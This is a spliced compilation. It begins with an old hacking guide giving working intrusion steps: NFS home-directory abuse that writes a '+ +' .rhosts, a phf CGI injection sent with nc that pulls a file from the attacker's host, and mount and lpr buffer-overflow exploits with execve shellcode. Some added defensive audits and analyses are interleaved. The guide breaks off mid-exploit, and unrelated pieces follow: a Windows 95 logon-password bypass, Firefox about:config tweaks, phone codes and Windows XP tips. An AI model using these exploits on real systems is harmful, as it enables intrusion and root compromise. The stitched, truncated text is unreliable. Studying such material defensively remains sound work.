    Well, I ain't telling you anything of that...

    Copyright, and other stuff like this (below).

    Copyright and stuff...

    ______________________

    If you feel offended by this subject (hacking) or you think that you could

    do better, don't read the below information...

    This file is for educational purposes ONLY...;)

    I ain't responsible for any damages you made after reading this...(I'm very

    serious...)

    So this can be copied, but not modified (send me the changes, and if they

    are good, I'll include them ).

    Don't read it, 'cuz it might be illegal.

    I warned you...

    If you would like to continue, press .

    Intro: Hacking step by step.

    _________________________________________________________________________________

    Well, this ain't exactly for beginners, but it'll have to do.

    What all hackers have to know is that there are 4 steps in hacking...

    Step 1: Getting access to site.

    Step 2: Hacking r00t.

    Step 3: Covering your traces.

    Step 4: Keeping that account.

    Ok. In the next pages we'll see exactly what I meant.

    Step 1: Getting access.

    _______

    Well folks, there are several methods to get access to a site.

    I'll try to explain the most used ones.

    The first thing I do is see if the system has an export list:

    mysite:~>/usr/sbin/showmount -e victim.site.com

    RPC: Program not registered.

    If it gives a message like this one, then it's time to search for another way in.

    What I was trying to do was to exploit an old security problem in most

    SUN OS's that could allow a remote attacker to add a .rhosts to a user's

    home directory... (That was possible if the site had exported their home

    directory.)

    Let's see what happens...

    mysite:~>/usr/sbin/showmount -e victim1.site.com

    /usr victim2.site.com

    /home (everyone)

    /cdrom (everyone)

    mysite:~>mkdir /tmp/mount

    mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/

    mysite:~>ls -sal /tmp/mount

    total 9

    1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./

    1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../

    1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/

    1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/

    1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/

    1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/

    1 -rw------- 1 root root 242 Mar 9 1997 sudoers

    1 drwx------ 3 test 100 1024 Oct 8 21:05 test/

    1 drwx------ 15 102 100 1024 Oct 20 18:57 rapper/

    Well, we wanna hack into rapper's home.

    mysite:~>id

    uid=0 euid=0

    mysite:~>whoami

    root

    mysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd

    We use /bin/csh 'cuz bash leaves a (Damn!) .bash_history and you might

    forget it on the remote server...

    mysite:~>su - rapper

    Welcome to rapper's user.

    mysite:~>ls -lsa /tmp/mount/

    total 9

    1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./

    1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../

    1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/

    1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/

    1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/

    1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/

    1 -rw------- 1 root root 242 Mar 9 1997 sudoers

    1 drwx------ 3 test 100 1024 Oct 8 21:05 test/

    1 drwx------ 15 rapper daemon 1024 Oct 20 18:57 rapper/

    So we own this guy's home directory...

    mysite:~>echo "+ +" > rapper/.rhosts

    mysite:~>cd /

    mysite:~>rlogin victim1.site.com

    Welcome to Victim.Site.Com.

    SunOs ver....(crap).

    victim1:~$

    This is the first method...
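    A defender-side audit for the two weaknesses this first method depends on (a home directory exported to everyone, and a wildcard .rhosts), written as an added example that is not part of the original guide; the showmount output it parses is constructed to mirror the listing above, and every host name in it is a placeholder.

```python
"""Audit helpers for world-readable NFS exports and wildcard .rhosts trust.

Added example (not the guide's own code).  The sample output below is
constructed in the shape `showmount -e` prints; the host names are
placeholders.
"""

from typing import Dict, List

# Constructed sample: one export per line, path then comma-separated
# client list; "(everyone)" means the export carries no host restriction.
SAMPLE_SHOWMOUNT = """Export list for nfs-server.example.invalid:
/usr   client2.example.invalid
/home  (everyone)
/cdrom (everyone)
/data  192.168.1.0/24,admin.example.invalid
"""


def parse_showmount(output: str) -> Dict[str, List[str]]:
    """Map each exported path to the client specs allowed to mount it."""
    exports: Dict[str, List[str]] = {}
    for line in output.splitlines():
        line = line.strip()
        if not line or line.startswith("Export list"):
            continue  # banner line, not an export
        parts = line.split(None, 1)
        path = parts[0]
        clients = parts[1].split(",") if len(parts) > 1 else []
        exports[path] = [c.strip() for c in clients if c.strip()]
    return exports


def world_exports(output: str) -> List[str]:
    """Exported paths that any host on the network may mount."""
    return sorted(
        path
        for path, clients in parse_showmount(output).items()
        if any(c in ("(everyone)", "*") for c in clients)
    )


def rhosts_trusts_everyone(content: str) -> bool:
    """True if an .rhosts file contains a '+' wildcard.

    '+' in the host field trusts every host, '+' in the user field trusts
    every user on the listed host, and "+ +" trusts everyone.  Blank lines
    and '#' comments are ignored.
    """
    for line in content.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else ""
        if host == "+" or user == "+":
            return True
    return False


def audit(showmount_output: str, rhosts_files: Dict[str, str]) -> List[str]:
    """Return one finding per unrestricted export and per wildcard .rhosts.

    rhosts_files maps a file path (as found under each exported home) to
    that file's contents.
    """
    findings: List[str] = []
    for path in world_exports(showmount_output):
        findings.append(f"export {path} is mountable by any host")
    for name, content in rhosts_files.items():
        if rhosts_trusts_everyone(content):
            findings.append(f"{name} grants passwordless rlogin to everyone")
    return findings


if __name__ == "__main__":
    # Constructed .rhosts contents for the demonstration run.
    sample_rhosts = {
        "/home/rapper/.rhosts": "+ +\n",
        "/home/at1/.rhosts": "# only the admin box\nadmin.example.invalid at1\n",
    }
    for finding in audit(SAMPLE_SHOWMOUNT, sample_rhosts):
        print(finding)
```

    Run it against the real output of `showmount -e <your-nfs-server>` and the .rhosts files found under the exported homes; a world export of /home combined with any wildcard .rhosts is exactly the condition the walkthrough relies on.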

    Another method could be to see if the site has port 80 open. That would

    mean that the site has a web page.

    (And that's very bad, 'cuz it's usually vulnerable).

    Below I include the source of a scanner that helped me before NMAP was written.

    (Go get it at http://www.dhp.com/~fyodor. Good job, Fyodor).

    NMAP is a scanner that even does stealth scanning, so lots of systems won't

    record it.

    /* -*-C-*- tcpprobe.c */
    /* tcpprobe - report on which tcp ports accept connections */
    /* IO ERROR, error@axs.net, Sep 15, 1995 */
    /* The header names, the port loop bound and the "< 0" comparisons did not
       survive extraction; they are restored here from the calls the code makes.
       The upper port bound is an assumption, not the original value. */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <ctype.h>
    #include <errno.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <netdb.h>

    #define MAX_PORT 65535   /* assumed; the original bound was lost in extraction */

    int main(int argc, char **argv)
    {
        struct hostent *host;
        int err, i, net;
        struct sockaddr_in sa;

        if (argc != 2) {
            printf("Usage: %s hostname\n", argv[0]);
            exit(1);
        }
        for (i = 1; i <= MAX_PORT; i++) {
            /* zero the address structure before filling it in */
            memset(&sa, 0, sizeof sa);
            sa.sin_family = AF_INET;
            if (isdigit((unsigned char)*argv[1]))
                sa.sin_addr.s_addr = inet_addr(argv[1]);
            else if ((host = gethostbyname(argv[1])) != 0)
                /* memcpy, not strncpy: an address containing a zero byte
                   (e.g. 10.0.0.1) would otherwise be truncated */
                memcpy(&sa.sin_addr, host->h_addr_list[0], sizeof sa.sin_addr);
            else {
                herror(argv[1]);
                exit(2);
            }
            sa.sin_port = htons(i);
            net = socket(AF_INET, SOCK_STREAM, 0);
            if (net < 0) {
                perror("\nsocket");
                exit(2);
            }
            err = connect(net, (struct sockaddr *) &sa, sizeof sa);
            if (err < 0) {
                /* refused/unreachable ports are reported on one updating line */
                printf("%s %-5d %s\r", argv[1], i, strerror(errno));
                fflush(stdout);
            } else {
                /* a completed three-way handshake means the port accepts connections */
                printf("%s %-5d accepted. \n", argv[1], i);
                if (shutdown(net, 2) < 0) {
                    perror("\nshutdown");
                    exit(2);
                }
            }
            close(net);
        }
        printf(" \r");
        fflush(stdout);
        return (0);
    }

    Well, now be very careful with the below exploits, because they usually get

    logged.

    Besides, if you really wanna get a source file from /cgi-bin/ use this

    syntax: lynx http://www.victim1.com//cgi-bin/finger

    If you don't wanna do that, then do a :

    mysite:~>echo "+ +" > /tmp/rhosts

    mysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+

    /root/.rhosts" | nc -v - 20 victim1.site.com 80

    then

    mysite:~>rlogin -l root victim1.site.com

    Welcome to Victim1.Site.Com.

    victim1:~#

    Or, maybe, just try to find out usernames and passwords...

    The usual users are "test", "guest", and maybe the owner of the site...

    I usually don't do such things, but you can...

    Or if the site is really old, use that (quote site exec) old bug for

    wu.ftpd.

    There are a lot of other exploits, like the remote exploits (innd, imap2,

    pop3, etc...) that you can find at rootshell.connectnet.com or at

    dhp.com/~fyodor.

    Enough about this topic. (besides, if you can finger the site, you can

    figgure out usernames and maybe by guessing passwords (sigh!) you could get

    access to the site).
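    What that phf request actually does, as an added example that is not part of the original text: a Python re-creation of the logic in NCSA's phf.c. The command shape ("ph -m alias=...") and the list of characters escape_shell_cmd() handled are reproduced from that code as I remember it and should be read as approximations, not the original C; the query string is the one used above. The hardened variant at the end is the fix a reviewer would ask for: no shell, and a whitelist on the alias.

```python
import re
from urllib.parse import unquote_plus

# Characters NCSA httpd's escape_shell_cmd() backslash-escaped before the string
# went to popen(). Newline is not among them, which is the whole phf bug.
# (Reproduced from memory of the NCSA source; treat as approximate.)
NCSA_SHELL_META = "&;`'\"|*?~<>^()[]{}$\\"

def ncsa_escape_shell_cmd(s):
    """Approximate re-creation of the NCSA escaping routine (not the original C)."""
    return "".join("\\" + c if c in NCSA_SHELL_META else c for c in s)

def phf_command_line(query):
    """The shell command phf ended up running for a Qalias= value. phf built
    'ph -m alias=VALUE' and passed it to popen(), i.e. to /bin/sh -c."""
    alias = unquote_plus(query)               # %0a -> newline, '+' -> space
    return "/usr/local/bin/ph -m alias=" + ncsa_escape_shell_cmd(alias)

def shell_commands(cmdline):
    """What /bin/sh -c executes: one command per line."""
    return [line for line in cmdline.split("\n") if line.strip()]

# Hardened form: no shell at all, and a whitelist on the alias before it
# becomes an argv element handed to subprocess.run().
ALIAS_OK = re.compile(r"[A-Za-z0-9._@-]+")

def alias_is_safe(query):
    return ALIAS_OK.fullmatch(unquote_plus(query)) is not None

def safe_ph_argv(query):
    if not alias_is_safe(query):
        raise ValueError("alias contains characters outside the whitelist: %r" % unquote_plus(query))
    return ["/usr/local/bin/ph", "-m", "alias=" + unquote_plus(query)]

if __name__ == "__main__":
    q = "x%0arcp+phantom@mysite.com:/tmp/rhosts+/root/.rhosts"   # the request from the text
    for cmd in shell_commands(phf_command_line(q)):
        print("sh would run:", cmd)
    print("accepted by the hardened version:", alias_is_safe(q))
```

    The second line that sh would run is the rcp; the web server never saw a "command", only an alias value, which is why input validation at the boundary (or, better, avoiding the shell entirely) is the fix rather than a longer escape list.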

    Step 2: Hacking r00t.

    ______

    First you have to find out which operating system the target is running.

    a). LINUX

    ALL versions:

    A big bug in all Linux versions is the buffer overflow in mount/umount, and
    (maybe) lpr.

    /* Mount Exploit for Linux, Jul 30 1996

    ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

    ::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````"":::::::::

    :::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::

    ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::::::

    ::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::

    ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::

    ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::

    ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::

    ::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ ::::::

    :::::::...........:::...........:::...........::.......:......:.......::::::

    :::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::

    Discovered and Coded by Bloodmask & Vio

    Covin Security 1996

    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/types.h>

    #define PATH_MOUNT "/bin/mount"
    #define BUFFER_SIZE 1024
    #define DEFAULT_OFFSET 50

    /* leaves the stack pointer in %eax, which is where the caller reads the
       return value (i386 only) */
    u_long get_esp()
    {
        __asm__("movl %esp, %eax");
    }

    int main(int argc, char **argv)
    {
        /* execve("/bin/sh") followed by exit(); free of NUL bytes so it survives
           being passed as a C string in argv */
        u_char execshell[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
        "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
        "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
        char *buff = NULL;
        unsigned long *addr_ptr = NULL;
        char *ptr = NULL;
        int i;
        int ofs = DEFAULT_OFFSET;

        buff = malloc(4096);
        if (!buff) {
            printf("can't allocate memory\n");
            exit(0);
        }
        ptr = buff;

        /* fill start of buffer with nops */
        memset(ptr, 0x90, BUFFER_SIZE - strlen((char *)execshell));
        ptr += BUFFER_SIZE - strlen((char *)execshell);

        /* stick asm code into the buffer */
        for (i = 0; i < strlen((char *)execshell); i++)
            *(ptr++) = execshell[i];

        /* follow the buffer with two copies of the guessed address so the saved
           return address on mount's stack points into the NOP sled */
        addr_ptr = (unsigned long *)ptr;
        for (i = 0; i < (8 / 4); i++)
            *(addr_ptr++) = get_esp() + ofs;
        ptr = (char *)addr_ptr;
        *ptr = 0;

        (void)alarm((u_int)0);
        printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
        execl(PATH_MOUNT, "mount", buff, NULL);
        return 0;
    }

    /* LPR exploit: I don't know the author... */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/types.h>

    #define DEFAULT_OFFSET 50
    #define BUFFER_SIZE 1023

    long get_esp(void)
    {
        __asm__("movl %esp,%eax\n");
    }

    int main(void)
    {
        char *buff = NULL;
        unsigned long *addr_ptr = NULL;
        char *ptr = NULL;
        /* same execve("/bin/sh") shellcode as the mount exploit */
        u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
        "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
        "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
        "\xd7\xff\xff\xff/bin/sh";
        int i;

        buff = malloc(4096);
        if (!buff) {
            printf("can't allocate memory\n");
            exit(0);
        }
        ptr = buff;

        /* NOP sled, then the shellcode, filling the 1023-byte buffer */
        memset(ptr, 0x90, BUFFER_SIZE - strlen((char *)execshell));
        ptr += BUFFER_SIZE - strlen((char *)execshell);
        for (i = 0; i < strlen((char *)execshell); i++)
            *(ptr++) = execshell[i];

        /* two copies of the guessed return address, then the terminating NUL */
        addr_ptr = (unsigned long *)ptr;
        for (i = 0; i < 2; i++)
            *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
        ptr = (char *)addr_ptr;
        *ptr = 0;

        /* -C is the job classification string, which lpr copied into a fixed buffer */
        execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
        return 0;
    }
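    How the two exploits above lay out their argument, as an added Python example that is not part of either exploit: it builds the same [NOP sled][shellcode][return address x2][NUL] buffer and runs the two checks that decide whether such a payload can be delivered through execl() at all: the address must contain no 0x00 byte (a C string would be cut short there) and the shellcode itself must be NUL-free. The shellcode is copied byte for byte from the exploits; the stack pointer 0xbffff7a0 in the usage lines is an assumed value for illustration, not something measured.

```python
import struct

# The shellcode shared by the mount and lpr exploits above, byte for byte.
EXECSHELL = (b"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
             b"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
             b"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh")
NOP = 0x90            # i386 'nop'
INT80 = b"\xcd\x80"   # i386 'int 0x80', the Linux system call instruction

def build_payload(shellcode, esp, offset=50, buffer_size=1024, slots=2):
    """Same layout as the exploits: a NOP sled padded so the shellcode ends
    exactly at buffer_size, then `slots` copies of the guessed return address
    (esp + offset, little-endian), then the NUL that terminates an argv string."""
    if len(shellcode) > buffer_size:
        raise ValueError("shellcode longer than the target buffer")
    ret = struct.pack("<I", (esp + offset) & 0xFFFFFFFF)
    return bytes([NOP]) * (buffer_size - len(shellcode)) + shellcode + ret * slots + b"\x00"

def argv_safe(payload):
    """execl() hands the payload over as a C string, so a NUL anywhere but the
    very end truncates it and the return address never reaches the stack."""
    return payload.endswith(b"\x00") and b"\x00" not in payload[:-1]

def shellcode_facts(sc):
    """The sanity checks to run on shellcode before trusting it."""
    return {
        "length": len(sc),
        "syscalls": sc.count(INT80),            # execve(), then exit()
        # 'mov eax,0x1234561b' / 'xor eax,0x12345610' leaves 11 (execve) in eax
        # without a 0x00 byte appearing in the instruction stream
        "nul_free": b"\x00" not in sc,
        "ends_with_bin_sh": sc.endswith(b"/bin/sh"),
    }

if __name__ == "__main__":
    # 0xbffff7a0 is an assumed stack pointer for illustration, not a measured value
    p = build_payload(EXECSHELL, 0xbffff7a0)
    print(len(p), argv_safe(p), shellcode_facts(EXECSHELL))
    # an address with 0x00 bytes in it cannot travel through argv at all
    print(argv_safe(build_payload(EXECSHELL, 0xbfff0000, offset=0)))
```

    The second usage line is the failure mode the DEFAULT_OFFSET fudge exists to avoid: if esp + offset lands on an address with a zero byte, the string ends early and the overflow never reaches the saved return address.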

    b.) Versions 1.2.* to 1.3.2

    NLSPATH env. variable exploit:

    /* It's really annoying for users and good for me...
       The at exploit gives only uid=0 and euid=your_usual_euid.
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/types.h>

    #define path "/usr/bin/at"
    #define BUFFER_SIZE 1024
    #d

    By SUMIT SINGHAL

    Have you ever forgotten your Windows password and been unable to get at the files you wanted? Here is how to change the password without knowing the old one. This applies to Windows 95/98, where the logon password is kept in a .pwl file.

    1) When the computer boots, keep pressing F8 until you get the startup menu.
    2) Select the option that boots to a DOS command prompt.
    3) Change into the Windows folder by typing "cd windows" (without the quotes).
    4) Type "dir *.pwl". This lists the password list files, one per user name.
    5) Once you have found the one that is yours (or anyone else's you want to get into), type del username.pwl
    6) Reboot the computer.
    7) At the logon prompt, enter the user name whose file you deleted and any password you like.
    8) The computer will say something like "There is no password for this user. Would you like to use this one? Confirm."
    9) Type your password again, and you're in.
    10) Sit back and watch everyone else try to open their Windows boxes with the wrong password!

    Note that the Windows 9x logon password only gates the logon dialog and the saved network passwords cached in the .pwl file; it never protected the files on the disk, which were readable from the DOS prompt the whole time.

    Discover more than 20 behind-the-scenes tweaks for speeding up page loads, reducing memory drain and making the interface behave the way you want it to


    Ever since its debut, Firefox has garnered a reputation for being an enormously customizable program, both through its add-on architecture and its internal settings. In fact, many of Firefox's settings aren't exposed through the Tools > Options menu; the only way to change them is to edit them manually. In this article, we'll explore some of the most useful Firefox settings that you can change on your own and that aren't normally available through the program's graphical interface. The closest analogy to how Firefox manages its internal settings is the Windows Registry. Each setting, or preference, is given a name and stored as a string (text), integer (number) or Boolean (true/false) value. However, Firefox doesn't keep its settings in the registry, but in a file called prefs.js. You can edit prefs.js directly, but it's often easier to change the settings through the browser window.

    Type about:config in the address bar and press Enter, and you'll see every preference Firefox knows about, listed in alphabetical order: the built-in defaults plus anything you have overridden (only the overrides are written to prefs.js). To narrow down the hundreds of configuration preferences to just the few you need, type a search term into the Filter: bar. (Click the Show All button or just clear the Filter: bar to get the full list back again.)

    [Screenshot: the about:config page.]

    To edit a preference, double-click on the name and you'll be prompted for the new value. If you double-click on an entry that has a Boolean value, it'll just switch from true to false or vice versa; double-click again to revert to the original setting. Not all changes take effect immediately, so if you want to be absolutely certain a given change is in effect, be sure to close and reopen Firefox after making a change.

    [Screenshot: editing a preference.]

    Note that not every setting in about:config exists by default. Some of them have to be created manually. If you want to add a new preference, right-click somewhere on the page and select New, then select the type of item to create (String, Integer or Boolean) and supply the name and value.

    Before you begin

    Here are a few caveats to keep in mind as you explore and tweak:

    Not everyone will get the same benefits by enabling these tweaks. This is especially true for changing the network settings. If you habitually visit sites that don't allow a large number of connections per client, for instance, you won't see much benefit from raising the number of connections per server.

    Some hacks may have a limited shelf life. With each successive release of Firefox, the need for tweaking any of the performance-related config settings (like the network settings) may dwindle as Firefox becomes more self-tuning based on feedback from real-world usage scenarios. In short, what works now may not always work in the future -- and that might not be a bad thing.


    Keep a log of everything you change, or make backups. If you tweak something now and notice bizarre activity in a week, you'll want to be able to track back to what was altered and undo it. Firefox does show which about:config changes have been set manually, but this isn't always the most accurate way to find out what you changed.

    To make a backup of your preferences in Firefox, just make a copy of the file prefs.js, which is kept in your Firefox profile folder. If you mess something up, you can always copy this file back in. (Be sure to shut down Firefox before making a copy of prefs.js or moving a copy back into the profile folder!)

    In Windows XP, the profile folder is
    \Documents and Settings\USERNAME\Application Data\Mozilla\Firefox\Profiles\xxxxxxxx.default\

    In Windows Vista, this folder is
    \Users\USERNAME\AppData\Roaming\Mozilla\Firefox\Profiles\xxxxxxxx.default\

    where USERNAME is your login name and xxxxxxxx is a random string Firefox picks when it creates the profile. Note that Application Data and AppData are hidden folders by default, so they may not show up unless you force Explorer to show hidden objects. (Open the Control Panel, double-click Folder Options, select the View tab, select "Show hidden files and folders" and click OK.)

    In Mac OS X, the profile folder is
    ~/Library/Application Support/Firefox/Profiles/xxxxxxxx.default/

    and in Linux it's
    ~/.mozilla/firefox/xxxxxxxx.default/

    but on those platforms it's usually quicker simply to search for prefs.js.

    Alternatively, you can use the handy Firefox Extension Backup Extension (FEBE). It backs up not only the prefs.js file but just about every other thing in Firefox -- extensions, themes, cookies, form history and so on.
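    To act on the "keep a log of everything you change" advice above, an added example that is not from the article or from Mozilla: a Python script that parses two copies of prefs.js (the backup taken before tweaking and the live file afterwards) and reports which preferences were added, removed or changed, with the bool/int/string typing about:config uses. The two prefs.js snippets embedded in it are constructed sample data; the line format user_pref("name", value); is the one Firefox writes.

```python
import json
import re

# One line of prefs.js:  user_pref("network.http.max-connections", 48);
PREF_LINE = re.compile(r'^\s*user_pref\("((?:[^"\\]|\\.)*)",\s*(.*?)\);\s*$')

def parse_prefs_js(text):
    """Return {name: value} for every user_pref() line. Values come back as bool,
    int or str, the three types about:config uses; comments and blank lines are skipped."""
    prefs = {}
    for line in text.splitlines():
        m = PREF_LINE.match(line)
        if not m:
            continue
        name, raw = m.group(1), m.group(2)
        if raw in ("true", "false"):
            value = raw == "true"
        elif re.fullmatch(r"-?\d+", raw):
            value = int(raw)
        else:
            # a quoted string; prefs.js escaping is JSON-compatible for ordinary values
            value = json.loads(raw)
        prefs[name] = value
    return prefs

def diff_prefs(before, after):
    """Which preferences were added, removed or changed between two snapshots."""
    return {
        "added": {k: after[k] for k in after.keys() - before.keys()},
        "removed": {k: before[k] for k in before.keys() - after.keys()},
        "changed": {k: (before[k], after[k])
                    for k in before.keys() & after.keys() if before[k] != after[k]},
    }

# Constructed sample data: a backup from before tweaking and the live file afterwards.
PREFS_BEFORE = """\
# Mozilla User Preferences
/* Do not edit this file. */
user_pref("browser.startup.homepage", "http://www.example.com/");
user_pref("network.http.max-connections", 24);
user_pref("browser.tabs.closeButtons", 1);
"""
PREFS_AFTER = """\
user_pref("browser.startup.homepage", "http://www.example.com/");
user_pref("network.http.max-connections", 48);
user_pref("network.http.pipelining", true);
"""

def demo():
    return diff_prefs(parse_prefs_js(PREFS_BEFORE), parse_prefs_js(PREFS_AFTER))

if __name__ == "__main__":
    for kind, entries in demo().items():
        for name, value in sorted(entries.items()):
            print("%-8s %s = %r" % (kind, name, value))
```

    Run it against your backup and the current prefs.js (read both files into strings and pass them to parse_prefs_js) whenever Firefox starts behaving oddly; a preference that appears under "added" or "changed" without you remembering it is the first thing to revert.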

    Requirements: any phone with Bluetooth on which software can be installed.
    GPRS must be enabled.

    Go to this link:

    www.cellity.com

    Searched by SUMIT SINGHAL

    Secret Codes

    Monitor mode: Hold C and press 379
    Secret menu: Hold C and press 987
    Version number: Hold C and press 597
    Phase1 and 2 : Hold C and press 499
    Warm start : Hold C and press 179
    Instant turn off: Hold C and press 999
    Unlock menu: Hold C and press 787090

    20 things you didn't know about Windows XP





    You've read the reviews and digested the key feature enhancements and operational changes. Now it's time to delve a bit deeper and uncover some of Windows XP's secrets.




    1. It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they went between boots, XP is positively proud of its stamina. Open the Command Prompt (Start, All Programs, Accessories) and type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep it, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only.)

    2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type 'gpedit.msc'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care -- some may stop your computer behaving as you wish. (Professional Edition only).

    3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exe user32.dll,LockWorkStation' in the location field. Give the shortcut a name you like. That's it -- just double click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do the same.

    4. XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file \windows\inf\sysoc.inf, search for the word 'hide' and remove it. You can then go to Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.

    5. For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include 'eventcreate' and 'eventtriggers' for creating and watching system events, 'typeperf' for monitoring performance of various subsystems, and 'schtasks' for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options -- they're all far too baroque to go into here.

    6. XP has IP version 6 support -- the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type 'ipv6 install' into Run... (it's OK, it won't ruin your existing network setup) and then 'ipv6 /?' at the command line to find out more. If you don't know what IPv6 is, don't worry and don't bother.

    7. You can at last get rid of tasks on the computer from the command line by using 'taskkill /pid' and the task number, or just 'tskill' and the process number. Find that out by typing 'tasklist', which will also tell you a lot about what's going on in your system.

    8. XP will treat Zip files like folders, which is nice if you've got a fast machine. On slower machines, you can make XP leave zip files well alone by typing 'regsvr32 /u zipfldr.dll' at the command line. If you change your mind later, you can put things back as they were by typing 'regsvr32 zipfldr.dll'.

    9. XP has ClearType -- Microsoft's anti-aliasing font display technology -- but doesn't have it enabled by default. It's well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry value HKEY_USERS\.DEFAULT\Control Panel\Desktop\FontSmoothingType to 2.

    10. You can use Remote Assistance to help a friend who's using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your chum's real IP address -- they can find this out by going to www.whatismyip.com -- and get them to make sure that they've got port 3389 open on their firewall and forwarded to the errant computer.

    11. You can run a program as a different user without logging out and back in again. Right click the icon, select Run As... and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.

    12. Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might slip the bonds of sanity before that point, run Regedit, go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced and create a DWORD value called EnableBalloonTips with a value of 0.

    13. You can start up without needing to enter a user name or password. Select Run... from the start menu and type 'control userpasswords2', which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use.

    14. Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options... and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.

    15. XP comes with a free Network Activity Light, just in case you can't see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You'll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.

    16. The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry value HKEY_CURRENT_USER\Control Panel\Desktop\MenuShowDelay from the default 400 to something a little snappier. Like 0.

